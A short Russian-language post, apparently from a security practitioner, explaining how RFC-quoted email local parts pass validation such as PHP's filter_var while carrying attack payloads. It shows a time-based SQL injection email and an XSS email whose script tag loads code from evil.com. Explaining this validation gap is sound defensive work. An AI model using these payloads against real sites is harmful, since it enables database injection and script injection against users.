После эксплутации инъекции в sql с помощью следующего email адреса

"'-sleep(5)-'"@mail.local

невольно задумываешься: а какого хера это вообще пропустило как валидный email?

В целом, локальная часть (логин, до @) email’а может сожержать спецсимволы по RFC, если она заключена в двойные кавычки. А дальше - уже любимые языки программирования немного отходят от того, какие именно символы можно использовать.

Поэтому, следующая магия:

php -r "echo filter_var('\"\'--><script/src=//evil.com></script>\"@example.com', FILTER_VALIDATE_EMAIL);”

Провалидирует и вполне законно вернет мыло с вектором атаки: "'--><script/src=//evil.com></script>"@example.com

А там как дальше разработчики его отображают - отдельный вопрос.